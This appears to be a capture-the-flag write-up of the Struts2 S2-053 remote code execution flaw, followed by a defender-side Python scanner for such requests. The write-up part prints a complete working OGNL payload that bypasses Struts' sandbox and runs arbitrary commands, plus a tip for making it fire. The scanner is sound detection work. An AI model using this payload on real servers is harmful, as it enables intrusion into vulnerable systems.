1. S2-053 RCE (from a challenge topic)
http://www.whalwl.cn:8027/hello.action
Vulnerability cause: when Struts2 uses the Freemarker template engine while also allowing OGNL expression evaluation, the user-supplied data is not itself evaluated as OGNL, but after Freemarker renders it once the output becomes an expression that is parsed by OGNL a second time, which leads to arbitrary command execution. (To be honest, I did not fully understand the meaning, but roughly it means user input is not handled properly, which leads to RCE.)
Affected versions: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10
The content and exploit below are based on these two articles:
https://www.freebuf.com/vuls/147735.html
https://blog.csdn.net/qq_29647709/article/details/84955205
Payload:
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
The part of the payload that was marked in bold red (the value assigned to #cmd, here 'whoami') is the command to be executed.
It is worth noting that this payload has a small pitfall: a newline must be added at the very end, otherwise the command will not execute.
An analysis of the underlying principle will be added later.
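As an added defender-side example (not code from the original post or the referenced articles), a small Python scanner that flags request parameters with the shape the payload above relies on: an %{...} OGNL wrapper combined with sandbox-bypass or process-execution identifiers. The parameter values and the scanner itself are constructed here, not taken from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample of "key=value" request parameters, as a defender might pull
# them from an access log or WAF capture. The third one mimics the S2-053 shape:
# an OGNL expression that is percent-encoded and only becomes dangerous after
# Freemarker renders it once and OGNL evaluates the result a second time.
SAMPLE_PARAMS = [
    "redirectUri=/index.action",
    "name=alice",
    "redirectUri=%25%7B%28%23_memberAccess%3D...%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29%7D",
    "q=%7Bsearch%7D",
]

# An OGNL/Freemarker expression wrapper: %{...} or ${...}
OGNL_WRAPPER = re.compile(r"[%$]\{.*\}", re.S)

# Identifiers typical of S2-0xx payloads: sandbox bypass plus process execution
OGNL_SIGNS = [
    "#_memberAccess", "DEFAULT_MEMBER_ACCESS", "setMemberAccess",
    "getExcludedPackageNames", "getExcludedClasses",
    "java.lang.ProcessBuilder", "java.lang.Runtime", "@java.lang.System@",
]


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (payloads are often double-encoded) until stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(param: str) -> tuple:
    """Return ('suspicious', hits) or ('clean', []) for one 'key=value' parameter."""
    _key, _, raw = param.partition("=")
    value = decode_param(raw)
    hits = [sign for sign in OGNL_SIGNS if sign in value]
    # Require both the expression wrapper and at least one dangerous identifier,
    # so that ordinary braces in search strings do not trigger an alert.
    if OGNL_WRAPPER.search(value) and hits:
        return "suspicious", hits
    return "clean", []


def scan(params):
    """Classify every parameter; returns a list of (key, (verdict, hits))."""
    return [(p.partition("=")[0], classify(p)) for p in params]
```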